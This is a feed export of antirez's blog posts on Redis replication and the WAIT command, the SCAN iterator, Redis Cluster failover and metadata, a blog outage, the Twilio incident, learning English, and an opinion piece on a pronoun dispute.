Replication: synchronous or not?
===

Replication is one of the main concepts of distributed systems. For some state to be durable even when processes fail or when there are network partitions making processes unable to communicate, we are forced to use a simple but effective strategy, that is to take the same information “replicated” across different processes (database nodes).

Every kind of system featuring strong consistency will use a form of replication called synchronous replication. It means that before some new data is considered “committed”, a node requires acknowledge from other nodes that the information was received. The node initially proposing the new state, when the acknowledge is received, will consider the information committed and will reply to the client that everything went ok.

There is a price to pay for this safety: latency. Systems implementing strong consistency are unable to reply to the client before receiving enough acknowledges. How many acks are “enough”? This depends on the kind of system you are designing. For example in the case of strong consistent systems that are available as long as the majority of nodes are working, the majority of the nodes should reply back before some data is considered to be committed. The result is that the latency is bound to the slowest node that replies as the (N/2+1)th node. Slower nodes can be ignored once the majority is reached.

Asynchronous replication
===

This is why asynchronous replication exists: in this alternative model we reply to the client confirming its write BEFORE we get acknowledges from other nodes.
If you think at it from the point of view of CAP, it is like if the node *pretends* that there is a partition and can’t talk with the other nodes. The information will eventually be replicated at a latter time, exactly like an eventually consistent DB would do during a partition. Usually this latter time will be a few hundred microseconds later, but if the node receiving the write fails before propagating the write, but after it already sent the reply to the client, the write is lost forever even if it was acknowledged.

Redis uses asynchronous replication by default: Redis is designed for performances and low, easy to predict, latency. However if possible it is nice for a system to be able to adapt consistency guarantees depending on the kind of write, so some form of synchronous replication could be handy even for Redis.

WAIT: call me synchronous if you want.
===

The way I depicted synchronous replication above, makes it sound simpler than it actually is.

The reality is that usually synchronous replication is “transactional”, so that a write is propagated to the majority of nodes (or *all* the nodes with some older algorithm), or none, in one way or the other not only the node proposing the state change must wait for a reply from the majority, but also the other nodes need to wait for the proposing node to consider the operation committed in order to, in turn, commit the change. Replicas require in one way or the other a mechanism to collect the write without applying it, basically.

This means that nothing happens during this process, everything is blocked for the current operation, and later you can process a new one, and so forth and so forth.

Because synchronous replication can be very costly, maybe we can do with a bit less? We want a way to make sure some write propagated across the replicas, but at the same time we want other clients to go at light speed as usually sending commands and receiving replies. Clients waiting in a synchronous write should never block any other client doing other synchronous or non-synchronous work.

There is a tradeoff you can take: WAIT does not allow to rollback an operation that was not propagated to enough slaves. It only offers, merely, a way to inform the client about what happened.
The information, specifically, is the number of replicas that your write was able to reach, all this encapsulated into a simple to use blocking command.

This is how it works:

redis 127.0.0.1:9999> set foo bar
OK
redis 127.0.0.1:9999> incr mycounter
(integer) 1
redis 127.0.0.1:9999> wait 5 100
(integer) 7

Basically you can send any number of commands, and they’ll be executed, and replicated as usually.
As soon as you call WAIT however the client stops until all the writes above are successfully replicated to the specified number of replicas (5 in the example), unless the timeout is reached (100 milliseconds in the example).

Once one of the two limits is reached, that is, the master replicated to 5 replicas, or the timeout was reached, the command returns, sending as reply the number of replicas reached. If the return value is less than the replicas we specified, the request timed out, otherwise the above commands were successfully replicated to the specified number of replicas.

In practical terms this means that you have to deal with the condition in which the command was accepted by less replicas you specified in the amount of time you specified. More about that later.

How it works?
===

The WAIT implementation is surprisingly simple. The first thing I did was to take the blocking code of BLPOP & other similar operations and make it a generic primitive of Redis internal API, so now implementing blocking commands is much simpler.

The rest of the implementation was trivial because 2.8 introduced the concept of master replication offset, that is, a global offset that we increment every time we send something to the slaves. All the salves receive exactly the same stream of data, and remember the offset processed so far as well.

This is very useful for partial resynchronization as you can guess, but moreover slaves acknowledge the amount of replication offset processed so far, every second, with the master, so the master has some idea about how much they processed.

Every second sucks right? We can’t base WAIT on an information available every second. So when WAIT is used by a client, it sets a flag, so that all the WAIT callers in a given event loop iteration will be grouped together, and before entering the event loop again we send a REPLCONF GETACK command into the replication stream. Slaves will reply ASAP with a new ACK.

As soon as the ACKs received from slaves is enough to unblock some client, we do it. Otherwise we unblock the client on timeout.

Not considering the refactoring needed for the block operations that is technically not part of the WAIT implementation, all the code is like 170 lines of code, so very easy to understand, modify, and with almost zero effects on the rest of the code base.

Living with the indetermination
===

WAIT does not offer any “transactional” feature to commit a write to N nodes or nothing, but provides information about the degree of durability we achieved with our write, in an easy to use form that does not slow down operations of other clients.

How this improves consistency in Redis land? Let’s look at the following pseudo code:

def save_payment(payment_id)
redis.set(payment_id,”confirmed”)
end

We can imagine that the function save_payment is called every time an user payed for something, and we want to store this information in our database. Now imagine that there are a number of clients processing payments, so the function above gets called again and again.

In Redis 2.6 if there was an issue communicating with the replicas, while running the above code, it was impossible to sense the problem in time. The master failing could result in replicas missing a number of writes.

In Redis 2.8 this was improved by providing options to stop accepting writes if there are problems communicating with replicas. Redis can check if there are at least N replicas that appear to be alive (pinging back the master) in this setup. With this option we improved the consistency guarantees a bit, now there is a maximum window to write to a master that is not backed by enough replicas.

With WAIT we can finally considerably improve how much safe are our writes, since I can modify the code in the following way:

def save_payment(payment_id)
redis.set(payment_id,”confirmed”)
if redis.wait(3,1000) >= 3 then
return true
else
return false
end

In the above version of the program we finally gained some information about what happened to the write, even if we actually did not changed the outcome of the write, we are now able to report back this information to the caller.
However what to do if wait returns less than 3? Maybe we could try to revert our write sending redis.del(payment_id)? Or we can try to set the value again in order to succeed the next time?

With the above code we are exposing our system to too much troubles. In a given moment if only two slaves are accepting writes all the transactions will have to deal with this inconsistency, whatever it is handled. There is a better thing we can do, modifying the code in a way so that it actually does not set a value, but takes a list of events about the transaction, using Redis lists:

def save_payment(payment_id)
redis.rpush(payment_id,”in progress”) # Return false on exception
if redis.wait(3,1000) >= 3 then
redis.rpush(payment_id,”confirmed”) # Return false on exception
if redis.wait(3,1000) >= 3 then
return true
else
redis.rpush(payment_id,”cancelled”)
return false
end
else
return false
end

Here we push an “in progress” state into the list for this payment ID before to actually confirming it. If we can’t reach enough replicas we abort the payment, and it will not have the “confirmed” element. In this way if there are only two replicas getting writes the transactions will fail one after the other. The only clients that will have the deal with inconsistencies are the clients that are able to propagate “in progress” to 3 or more replicas but are not able to do the same with the “confirmed” write. In the above code we try to deal with this issue with a best-effort “cancelled” write, however there is still the possibility of a race condition:

1) We send “in progress”
2) We send “confirmed”, it only reaches 2 slaves.
3) We send “cancelled” but at this point the master crashed and a failover elected one of the slaves.

So in the above case we returned a failed transaction while actually the “confirmed” state was written.

You can do different things to deal better with this kind of issues, that is, to mark the transaction as “broken” in a strong consistent and highly available system like Zookeeper, to write a log in the local client, to put it in the hands of a message queue that is designed with some redundancy, and so forth.

Synchronous replication and failover: two close friends
===

Synchronous replication is important per se because it means, there are N copies of this data around, however to really exploit the improved data safety, we need to make sure that when a master node fails, and a slave is elected, we get the best slave.

The new implementation of Sentinel already elects the slave with the best replication offset available, assuming it publishes its replication offset via INFO (that is, it must be Redis 2.8 or greater), so a good setup can be to run an odd number of Redis nodes, with a Redis Sentinel installed in every node, and use synchronous replication to write to the majority of nodes. As long as the majority of the nodes is available, a Sentinel will be able to win the election and elect a slave with the most updated data.

Redis cluster is currently not able to elect the slave with the best replication offset, but will be able to do that before the stable release. It is also conceivable that Redis Cluster will have an option to only promote a slave if the majority of replicas for a given hash slot are reachable.

I just scratched the surface of synchronous replication, but I believe that this is a building block that we Redis users will be able to exploit in the future to stretch Redis capabilities to cover new needs for which Redis was traditionally felt as inadequate. Comments]]>
http://antirez.com/news/66
Blog lost and recovered in 30 minutes http://antirez.com/news/65 http://antirez.com/news/65 Mon, 02 Dec 2013 08:52:19 +0000
I just started a screen instance, and run something like ./redis-server --port 10000. Since this is equivalent to an empty config file with just "port 10000" inside I was running no disk backed at all.

Since Redis very rarely crashes, guess what, after more than one year it was still running inside the screen session, and I totally forgot that it was running like that, happily writing controversial posts in my blog. Yesterday my server was under attack. This caused an higher then normal load, and Linode rebooted the instance. As a result my blog was gone.

The good thing is that I recovered everything in about 30 minutes because simple systems are really better than complex systems when something bad happens. This blog is composed of posts that are just the verbatim dump of what I write in a text area. No formatting at all. Comments are handled by Disqus and the ID I submit is just the post ID.

All I had to do is to setup a new Redis server (this time with AOF, demonized, and a proper configuration file) and search in google one after the other the posts by URL (which is the same for all the post, only the incremental ID changes). For every post I opened the Google cache of the post, select the text, copy, and submit the new post.

The only thing I lost are the post dates... I could fix them modifying a bit the blog code to allow me to do this, but not sure I'll be able to find the time.

Long story short, this is a trivial example, and an human error, but even in serious well maintained systems shit happens, and when the architecture of something is simple, it is simpler to deal with even during failures.

Without to mention that now I know I don't have to enable backups as I can recovery everything. No, just kidding. Comments]]>
http://antirez.com/news/65
The fight against sexism is not a free pass http://antirez.com/news/64 http://antirez.com/news/64 Sun, 01 Dec 2013 15:48:37 +0000
Basically the developer Ben Noordhuis rejected a pull request involving a change in the documentation to use gender-neutral form instead of “him”. Joyent replied with this incredible post: http://www.joyent.com/blog/the-power-of-a-pronoun.

In the blog post you can read:

“But while Isaac is a Joyent employee, Ben is not—and if he had been, he wouldn't be as of this morning: to reject a pull request that eliminates a gendered pronoun on the principle that pronouns should in fact be gendered would constitute a fireable offense for me and for Joyent.”

A few lines later you can read: “Indeed, one of the challenges of an open source project that depends on volunteer effort isdealing with assholes”

Maybe Joyent is thinking something like, you can’t go wrong if you fight sexism, or something like that, as I can’t believe they had a so naive reaction. Really, we have 10k years of culture for a reason, to be able to discriminate more than that, it is not 2+2=4.

Probably Ben is not a sexist, maybe he believes simply that “him” does not make a difference in sexism every day. Everybody has his fight, and changing “him” in not the Ben fight, but possibly when Ben will have to evaluate a female candidate, he will use a truly meritocratic meter and WILL NOT GIVE A FUCK about the gender, like he did when refusing the pull request.

You can’t bash people that don’t have your vision, and you can’t think that the fight against sexism is a free pass. Joyent, you are liable of your actions, and your actions violate more fundamental civil rights than you think.

But the most disturbing thing is that companies act like that because of fear, the fear of the reaction of people that believe that the world is black or white, and that if you don’t see it the same color they see it, you are to blame, you are to crucify. Comments]]>
http://antirez.com/news/64
Finally Redis collections are iterable http://antirez.com/news/63 http://antirez.com/news/63 Sun, 27 Oct 2013 15:47:10 +0000
It is limited because it only allows to access data in a natural way, that is, in a data structure obvious way. Sorted sets are easy to access by score ranges, while hashes by field name, and so forth.
This API “way” has profound effects on what Redis is and how users organize data into it, because an API that is data-obvious means fast operations, less code and less bugs in the implementation, but especially forcing the application layer to make meaningful choices: the database as a system in which you are responsible of organizing data in a way that makes sense in your application, versus a database as a magical object where you put data inside, and then it will be able to fetch and organize data for you in any format.

However most Redis data types, including the outer key-value shell if we want to consider it a data type for a moment (it is a dictionary after all), are collections of elements. The key-value space is a collection of keys mapped to values, as Sets are collections of unordered elements, and so forth.

In most application logic using Redis the idea is that you know what member is inside a collection, or at least you know what member you should test for existence. But life is not always that easy, and sometimes you need something more, that is, to scan the collection in order to retrieve all the elements inside. And yes, since this is a common need, we have commands like SMEMBERS or HGETALL, or even KEYS, in order to retrieve everything there is inside a collection, but those commands are always a last-resort kind of deal, because they are O(N) operations.

Your collection is very small? Fine, use SMEMBERS and you get Redis-alike performances anyway. Your collection is big? Don’t use O(N) commands if not for “debugging” purposes. A popular example is the misused KEYS command, source of troubles for non-experts, and top hit among the Redis slow log entries.

Black holes
===

The problem is that because of O(N) operations, Redis collections, (excluding Sorted Sets that can be accessed by rank, in ranges, and in many other different ways), tend to be black holes where you put things inside, and you can hardly explore them again.

And there are plenty of reasons to explore what is inside. For example garbage collection tasks, schema migration, or even fixing what is inside keys after an application bug corrupted some data.

What we really needed was an iterator. Pieter Noordhuis and I were very aware of this problem since the early days of Redis, but it was a major design challenge because traditionally the deal is, you want a data structure to be iterable? Well, this is going to be a sorted tree-like data structure, with the concept of previous and next element.

Instead most Redis data types are based on hash tables, and Redis hash tables are even of the most particular kind, as them automatically and incrementally resize, so sometime you even have two tables at the same time slowly exchanging elements from one to the other.

Hash tables are cool because they have a good memory efficiency, and the constant-time access property. What we use is power-of-two sized hash tables, with chaining for collision handling, and this has worked pretty well so far. An indirect indicator is that sorted sets, the only data structure we have that is based on a tree-alike structure (skip lists) is measurably slower than others once elements start to pile up. While Log(N) is small, with million of elements it starts to be a big enough number that cache misses summed together make a difference.

There was no easy way to say goodbye to hash tables.

However eventually Pieter applied one of the most powerful weapons the designer has in its hands: sacrifice, and send me a pull request for a new SCAN command.

The command was able to walk the key space incrementally, using a cursor that is returned back to the user after every call to SCAN, so it is a completely stateless affair. It is something like that:

redis 127.0.0.1:6379> flushall
OK
redis 127.0.0.1:6379> debug populate 33
OK
redis 127.0.0.1:6379> scan 0
1) "52"
2) 1) "key:29"
2) "key:13"
3) "key:9"
4) "key:12"
5) "key:28"
6) "key:30"
7) "key:26"
8) "key:14"
9) "key:21"
10) "key:20"
redis 127.0.0.1:6379> scan 52
1) "9"
2) 1) "key:16"
2) "key:31"
3) "key:3"
4) "key:0"
5) "key:32"
6) "key:17"
7) "key:24"
8) "key:8"
9) "key:15"
10) "key:11"

… and so forth until the returned cursor is 0 again …

This is possible because SCAN does not make big promises, hence the sacrifice: it guarantees to return all the elements that are in the collection from the start to the end of the iteration, at least one time.

This means, for example, that:

1) Elements may be returned multiple times.
2) Elements added during the iteration may be returned, or not, at random.

It turns out that this is a perfectly valid compromise, and that at application level you can almost always do what is needed to play well with this properties. Sometimes the operation you are doing on every element are simply safe to re-apply, some other times you can just put a flag in your (for example) Hash in order to mark it as processed, or a timestamp perhaps, and so forth.

Eventually merged
===

Pieter did an excellent work, but the pull request remained pending forever (more than one year), because it relied on a complex to understand implementation. Basically in order to guarantee the previous properties with tables that can change from one SCAN call to the other, Pieter used a cursor that is incremented inverting the bits, in order to count starting from the most significant bits first. This is why in the example you see the returned cursor jumping forward and backward.

This has different advantages, including the fact that it returns a small number of duplicates when possible (by checking less slots than a more naive implementation). Eventually I studied his code and tried to find a simpler algorithm with the same properties without success, so what I did is to document the algorithm. You can read the description here in the
dict.c file: https://github.com/antirez/redis/blob/unstable/src/dict.c#L663

After you do some whiteboard reasoning, it is not too hard to see how it works, but it is neither trivial, however it works definitely very well.

So with the code merged into unstable, I tried to generalize the implementation in order to work with all the other types in Redis that can be iterated this way, that are Hashes, Sets and Sorted Sets, in the form of additional commands named HSCAN, SSCAN, ZSCAN.

You may wonder why to have a ZSCAN. The reason is that while sorted sets are iterable in other ways, the specific properties of the SCAN iterator are not trivial to simulate by scanning elements by rank or score. Moreover sorted sets are internally implemented by a skiplist and an hash table, so we already had the hash table and to extend SCAN to sorted sets was trivial.

Patterns too!
===

SCAN and its variants can be used with the MATCH option in order to only return elements matching a pattern. I’m also implementing the TYPE option in order to only return keys of a specific type.

This is almost for free, since SCAN does not guarantees to return elements at all, so what happens is that it scans something like 10 buckets of the hash table per call (by default, you can change this) and later filters the output. Even if the return value contains no elements, you keep iterating as soon as the returned cursor is non-zero.

As you can see this is something you could do client-side as well, by matching the returned elements with a pattern, but it is much faster to do it server side given that is a very common pattern, and one that users are already used to because of the KEYS command. And it requires less I/O of course, if the pattern only matches a small number of elements.

This is an example:

edis 127.0.0.1:6379> scan 0 MATCH key:1*
1) "52"
2) 1) "key:13"
2) "key:12"
3) "key:14"
redis 127.0.0.1:6379> scan 52 MATCH key:1*
1) "9"
2) 1) "key:16"
2) "key:17"
3) "key:15"
4) "key:11"
redis 127.0.0.1:6379> scan 9 MATCH key:1*
1) "59"
2) 1) "key:10"
2) "key:1"
3) "key:18"
redis 127.0.0.1:6379> scan 59 MATCH key:1*
1) "0"
2) 1) "key:19"

In the last call the returned cursor is 0, so we ended the iteration.

Excited about it? I’ve good news, this is going to be back ported into 2.8 since it is completely self contained code so if it is broken, it does not affect other stuff. Well not just that, there are very big companies that are using SCAN for some time now, so I’m confident it’s pretty stable.

Enjoy iterating!

Discuss this blog post on Hacker News: https://news.ycombinator.com/item?id=6633091 Comments]]>
http://antirez.com/news/63
New Redis Cluster meta-data handling http://antirez.com/news/62 http://antirez.com/news/62 Thu, 26 Sep 2013 15:46:48 +0000
Let's start with the problem to solve. Redis Cluster uses a master - slave design in order to recover from nodes failures. The key space is partitioned across the different masters in the cluster, using a concept that we call "hash slots". Basically every key is hashed into a number between 0 and 16383. If a given key hashes to 15, it means it is in the hash slot number 15. These 16k hash slots are split among the different masters.

At every single time only one master should serve a given hash slot. Slaves just replicate the master dataset so that it is possible to fail over a master and put the cluster again into an usable state where all the hash slots are served by one node.

Redis Cluster is client assisted and nodes are not capable to forward queries to other nodes. However nodes are able to redirect a client to the right node every time a client tries to access a key that is served by a different node. This means that every node in the cluster should know the map between the hash slots and the nodes serving them.

The problem I was trying to solve is, how to take this map in sync between nodes in a safe way? A safe way means that even in the event of net splits, eventually all the nodes will agree about the hash slots configuration.

Another problem to solve was the slave promotion. A master can have multiple slaves, how to detect, and how to act, when a master is failing and a slave should be promoted to replace it?

Metadata is not data
====================

In the case of Redis Cluster handling of metadata is significantly different than the way the user data itself is handled. The focus of Redis Cluster is:

1) Speed.
2) No need for merge operations, so that it is semantically simple to handle the very large values typical of Redis.
3) The ability to retain most writes originating from clients connected to the majority of masters.

Given the priorities, Redis Cluster, like the vanilla single node version of Redis, uses asynchronous replication where changes to the data set are streamed to slave nodes with an asynchronous acknowledgement from slaves. In other words when a node receives a write, the client most of the times directly talk with the node in charge for the key hash slot, and the node has no other chatting to do with other nodes.

However this means that Redis Cluster is not a true CP system: there is a window where writes can be lost. The trivial case to lose a write is to write to a master that stops working after accepting our write and replying to the client, but before being able to propagate the write to its slaves.

This window is very small, in the sub-millisecond range. However when a client is partitioned away from the majority of the master nodes there is a bigger window to lose data, as a partitioned master will continue to accept writes for some time, while on the majority side the same master may be failed over by a slave. So when the partition will be fixed, the master will be reconfigured as a slave and writes will be lost.

Apart from the replicas, a key is stored into a single master node, so there is no need to agree or merge its value. Given the design, there is no need to use an agreement protocol in order to write or read data to/from the cluster. However metadata is a different story, we want that every node has a coherent vision of the cluster setup, and that the right configuration is eventually propagated to all the nodes even in case of failures and network partitions.

Using an agreement algorithm
============================

The simplest way to solve such a problem is to use a consensus algorithm such as Paxos or Raft, and this was the direction I was going to take. However implementing consensus algorithms is hard. Actually it is so hard that often years are needed for implementations to stabilize.

At some point I noticed something that makes the work of Redis Cluster nodes simpler, that is, information about hash slots is always idempotent. If hash slot 5 is served by A, and later because the configuration changes hash slot 5 is served by B, nodes don't need to know what happened, everything they need is that the configuration for an hash slot was updated.

This changes everything basically: agreement protocols are able to take a state machine synchronized by running the same sequence of operations in every node. If the state machine is deterministic, then the internal state will be the same in all the nodes eventually. However all the state Redis Cluster needs, for a given slot, can be embedded into a single packet.

Because of this we don't need a log of operations stored on disk, nor a way to make sure to fetch all the operations still not fetched, or to figure out what should be applied and what not, all the state can be copied in a single message. In short Redis Cluster does not require a full agreement protocol so I stolen just what I needed from Raft, and tried to figure out the rest.

Failure detection
=================

In order to see if a node has issues, Redis Cluster still uses the old algorithm that is based on gossip. Nodes inform other nodes about the state of a few random nodes using ping / pong packets. These ping / pong packets are in turn used to check if a node is reachable from the point of view of the sender of the ping. If the (informal) majority of masters agree that a given node is not reachable, then the node is flagged as failing. I said "informal" as there is no true agreement here, but simply:

1) Every node flags other nodes are failing if the majority of master nodes signaled the node as down in a given time range.
2) Every node removes the flag if the node is back reachable and is a salve, or a master that after some time is still serving slots from our point of view (was not failed over).

The failure detection is completely informal and has the only property that eventually all the nodes will agree on the failure: either the majority of nodes will mark it as failing resulting into a chain effect that will force all the other nodes to mark the node as failing, OR there is no majority and if the node is reachable again everybody will clear the flag.

The point here is that the failure detection does not require any safety, it is only useful in order to trigger the safe part of the algorithm, that is, replacing the master with a slave and update the cluster configuration.

Slave promotion
===============

Promoting a slave must be a safe operation, and one that should ensure that the configuration change is propagated across the cluster as soon as possible.

Slave promotion is up to slaves and uses a mechanism very similar to the Raft algorithm leader election. This is what happens:

1) A slave detects its master is failing.
2) The slave will try to win the election in order to promote itself to master.
3) If it is successful, it will change its state and will advertise the new configuration.
4) If it is unsuccessful it will try again to win the election after some time.

Every slave will try to start the election at a slightly different time in order to avoid a split brain condition that will require a new election. Redis Cluster uses a random delay that is driven by the number of seconds a slave was disconnected from the master, in order to favor slaves that were able to talk with the master more recently (slaves with too old data don't try at all to get elected).

Every cluster node has the concept of currentTerm as in Raft, that is called currentEpoch in Redis Cluster. Every node tries to have a currentEpoch that is the highest found among other nodes, so this information is always added in ping /pong packets headers. Every time a node sees a currentEpoch of another node that is greater than its epoch, it updates its currentEpoch.

The election is like Raft: a slave that tries to get elected increments its currentEpoch and sends a failover-auth-request to every master hoping to get its vote. Masters refuse to vote if the master instance of the slave is not failing from the point of view of a given master, or if the currentTerm advertised by the slave is smaller than the currentTerm of the receiving master.

Also masters vote a single time for every epoch: this ensures that for every epoch we can have just a single winner, this is central both in the Raft algorithm and in the Redis Cluster slave election.

Basically, if a slave wins the election, it uses the epoch at which the election was won as the version of its configuration, and newer configurations always win over older configurations.

The configEpoch
===============

In order to make more clear how it works, we need to add some more information. Basically every ping / pong packet does not just publish the currentEpoch, but also the configEpoch, that is, the epoch at which the master started to serve its set of hash slots. Initially when a cluster is created every master uses a configEpoch of zero. As failover events happen, there will be nodes with greater configEpoch values.

As in the old algorithm, the ping and pong packets also carry a bitmap with the hash slots served by a given node. Since every node knows the last observed configEpoch of every other node, it can detect configuration changes to incorporate.

For instance if node B claims to serve hash slot 5 that was previously served by node A, but the configEpoch of node B is greater than the configEpoch we have for A, then we accept the new configuration.

The same mechanism is also used in order to reconfigure a reappearing master as a slave, or to reconfigure all the other slaves after a failover. The old master's served slots count will drop to zero, and the nodes will switch as replicas of the node that is serving the slots now.

The real algorithm used has more details that don't change the semantics, but make everything more fluid in common cases. For example after a slave wins an election it broadcasts a PONG to every node in order to make the configuration change faster, and to prevent other slaves from initiating a new useless election.

Similarly a master that was partitioned out from the majority for enough time (the same time needed to flag it as failing) stop accepting writes, and will not accept writes for a few more seconds even after the majority of masters is reachable again, in order to give some time to the other nodes to inform it of configuration changes. This makes less likely that a client with an old routing table will try and succeed to write to the returning master that is now failed over.

From the point of view of the code, the implementation is requiring a minor amount of code, as everything was already implemented in the old algorithm even if in a broken way, it was unsafe but the basic abstractions and message formats were ok.

All in all I'm failing in love with distributed programming and I hope to learn more in the next weeks... Comments]]>
http://antirez.com/news/62
English has been my pain for 15 years http://antirez.com/news/61 http://antirez.com/news/61 Sun, 01 Sep 2013 15:46:14 +0000
[1] http://paulgraham.com/accents.html

A long story
---

I still remember me and sullivan (http://www.isg.rhul.ac.uk/sullivan/) both drunk in my home in Milan trying to turn an attack I was working on, back in 1998, in a post that was understandable for BUGTRAQ users, and this is the poor result we obtained: http://seclists.org/bugtraq/1998/Dec/79

Please note the "Instead all others" in the second sentence. I'm still not great at English but I surely improved over 15 years, and sullivan now teaches in US and UK universities so I imagine he is totally fluent (spoiler warning: I'm still not). But here the point is, we were doing new TCP/IP attacks but we were not able to freaking write a post about it in English. It was 1998 and I already felt extremely limited by the fact I was not able to communicate, I was not able to read technical documentation written in English without putting too much efforts in the process of reading itself, so my brain was using like 50% of its energy to just read, and less was left to actually understand what I was reading.

However in one way or the other I always accepted English as a good thing. I always advice people against translation efforts in the topic of technology, since I believe that it is much better to have a common language to document and comment the source code, and actually to obtain the skills needed to understand written technical documentation in English is a simple effort for most people.

So starting from 1998 I slowly learned to fluently read English without making more efforts compared to reading something written in Italian.
I even learned to write at the same speed I wrote stuff in Italian, even if I hit a local minima in this regard, as you can see reading this post: basically I learned to write very fast a broken subset of English, that is usually enough to express my thoughts in the field of programming, but it is not good enough to write about general topics. I don't know most of the words needed to refer to objects you find in a kitchen for example, or the grammar constructs needed to formulate complex sentences, hypothetical structures, and so forth. As I now can communicate easily in the topic I care most, and in a way that other people can more or less understand everything I write, the pressure to improve has diminished greatly… However I recently discovered that this was the minor of my problems with English.

European English, that funny language
---

So while I managed to eventually write and read comfortably enough for my needs, I almost never experienced actual communication in an English speaking country until recently. Before that I always used English with other european (non UK) people, such as French, German, Spanish people.
Now the English spoken in these countries is the English spoken at English school lessons… Phonetically it has almost nothing to do with American or UK English. They say it is "BBC English" but actually it is not. It is a phonetically greatly simplified English that uses UK English grammar.

*That* version of English, actually allows people from around the world to communicate easily. The basic grammar is trivial to grasp, and in a few months of practice you can talk. The sound of the words is almost the same in all the non-UK speaking countries in Europe. So it works great.

There is just one problem, it has nothing to do with the real English spoken in UK, US, Canada, and other countries where English is a native language.

English is a bit broken, after all
---

Now I've a secret for you, that is everything but a secret except nobody says it in the context of English VS The World: English is a broken language, phonetically.
In Italy we have a long history, but a very late political unification. Different regions talk different dialects, and people have super strong accents. Before 1950, when the "TV Language Unification" happened, everybody was still taking with their *dialects* and italian was only mastered by a small percentage of people. Sicilian itself, the language talked the most by my family, predates Italian by centuries (http://en.wikipedia.org/wiki/Sicilian_language*).

Still, guess what, nobody has issues understanding one of another region, or even from a Switzerland canton. Italian is phonetically one of the simplest languages on the earth, and is full of redundancy. It has, indeed, a low information entropy and usually words are long with a good mix of consonants and vocals in every word. There are no special rules to pronounce a word, if you know the sound of every single letter, plus the sound of a few special combination of letters like "gl", "sc", you can basically pronounce 99.9% of the words correctly just reading them for the first time.

The fact that people from different English speaking countries have issues communicating is already a big hint about how odd is English phonetically.
For instance for me and many other non native English speakers it is very very very hard to understand what the fuck an UK people is telling. North Americans are a lot simpler usually.

Because of this "feature" of English the problem for me is not just my accent, that is IMHO the simplest thing to fix if I'll try to fix it putting enough work into it, but the ability to understand what people are saying to me. IMHO the fact that Paul Graham refers to "accents" is a bad attitude of UK/US people in this regard, hey guys, you are not understanding us, we are not understanding what you say as well, and it is hard to find people that, once your understanding limits are obvious, will try to slow down the pace of the conversation. Often even if I say I did not understand, I'll get the same sentence repeated the same at speed of light.

Learning written english as a first exposure is the killer
---

In my opinion one fact that made me so slow learning English is the fact that I started reading English without never ever listening to it.
My brain is full of associations between written words and funny sounds that really don't exist in the actual language.
My advice is that if you are learning English now, start listening as soon as possible to spoken English.

The osx "say" program is a good assistant, it is able to pronounce in a decent way most English words. NEVER learn a new word without learning what is its sound.

Introvert or extrovert?
---

One of the things that shocked me the most with my experience with the English language is how not mastering a language can switch you into an introvert. I'm an extrovert in Italy where most people are extroverts, in Sicily where there are even more extroverts, and inside my family that is composed mostly of extroverts. I'm kinda of an attention whore I guess (I hope I'm not, actually, but well, I'm very extrovert). Now when I have to talk in English, I'm no longer an extrovert anymore because of the communication barrier, and I regret every time I've to go to a meeting, or to be introduced to another person. It is a nightmare.

It's too late, let's study English
---

English in my opinion is only simple grammatically, but is a bad pick as a common language. However the reality is, it already won, there is no time to change it, and it is a great idea to talk in English better, even if this means to put a lot of efforts into it. This is what I'm doing myself, I'm trying to improve.

Another reason I find myself really in need to improve my English is that in 10 years I'll likely no longer write code professionally, and a logical option is to switch into the management side of IT, or to handle big projects where you are not supposed to write the bulk of the code. Well, if you think you need English as a developer, you'll need it a lot more as you go in other divisions of a typical IT company, even if you "just" have to actually manage many programmers.

However as a native English speaker you should really realize that a lot of people are doing serious efforts to learn a language that is hard to learn: it is not an hobby, to master English is a big effort that a lot of people are trying to do to make communication simpler. Without to mention how trivial is to go back in the learning process as long as you stop talking / listening for a couple of weeks…

My long term hope is that soon or later different accents could converge into a standard easy-to-understand one that the English speaking population could use as a lingua franca. Comments]]>
http://antirez.com/news/61
Twilio incident and Redis http://antirez.com/news/60 http://antirez.com/news/60 Tue, 23 Jul 2013 15:45:52 +0000
http://www.twilio.com/blog/2013/07/billing-incident-post-mortem.html

The problem was about a Redis server, since Twilio is using Redis to store the in-flight account balances, in a master-slaves setup, with multiple slaves in different data centers for obvious availability and data safety concerns.

This is a short analysis of the incident, what Twilio can do and what Redis can do to avoid this kind of issues.

The first observation is that Twilio uses Redis, an in memory system, in order to save balances, so everybody will say "WTF Twilio! Are you serious with your data?". Actually Redis uses memory to serve data and to internally manipulate its data structures, but the incident has *nothing to do* with the durability of Redis as a DB. In fact Twilio stated that they are using the append only file that can be a very durable solution as explained here: http://oldblog.antirez.com/post/redis-persistence-demystified.html

The incident is actually centered around two main aspects of Redis:

1) The replication system.
2) The configuration.

I'll address they two things respectively.

Analysis of the replication issue
===

Redis 2.6 always needs a full resynchronization between a master and a slave after a connection issue between the two.
Redis 2.8 addressed this problem, but is currently a release candidate, so Twilio had no way to use the new feature called "partial resynchronization".

Apparently the master became unavailable because many slaves tried to resynchronize at the same time.

Actually for the way Redis works a single slave or multiple slaves trying to resynchronize should not make a huge difference, since just a single RDB is created. As soon as the second slave attaches and there is already a background save in progress in order to create the first RDB (used for the bulk data transfer), it is put in a queue with the previous slave, and so forth for all the other slaves attaching. Redis will just produce a single RDB file.

However what is true is that Redis may use additional memory with many slaves attaching at the same time, since there are multiple output buffers to "record" to transfer when the RDB file is ready. This is true especially in the case of replication over WAN. In the Twilio blog post I read "multiple data centers" so it is possible that the replication process may be slow in some case.

The bottom line is, Redis normally does not need to go slow when multiple slaves are resynchronizing at the same time, unless something strange happens like hitting the memory limit of the server, with the master starting to swap and/or problems with very slow disks (probably EC2?) so that creating an RDB starts to mess with the ability to write to the AOF file.

However issues writing to the AOF are a bit unlikely to be the cause, since during the AOF rewrite there is the same kind of disk i/o stress, with one thread writing a lot of data to the new AOF, and the other (main) thread logging every new write to the AOF. Everything considered memory pressure seems more probable, but Twilio engineers can just comment with details about what happened, this will be an useful real-world data point for sure.

From the Twilio side, what is possible to do to minimize incidents, is to understand exactly why the master is not able, with the current architecture, to survive without serious loss of performance to many slaves resynchronizing.

From the Redis side, well, we had to do our homework and provide partial resynchronization *long time ago* probably, we finally have it in Redis 2.8, and it is very good that a few days ago I pushed forward the 2.8 release skipping all the other pending features for this release that will be postponed for the next release. Now we have the first release candidate, in a few weeks this should be a release in the hands of users.

The configuration
===

The other obvious problem, probably the biggest one, was restarting the master with the wrong configuration.

Again I think here there was an human error that was "helped" by a Redis non perfect mechanism.

Basically up to Redis 2.6 you had CONFIG SET to change the configuration by hand, so it was possible for example to switch the system from RDB to AOF for more data safety with just:

redis-cli CONFIG SET appendonly yes

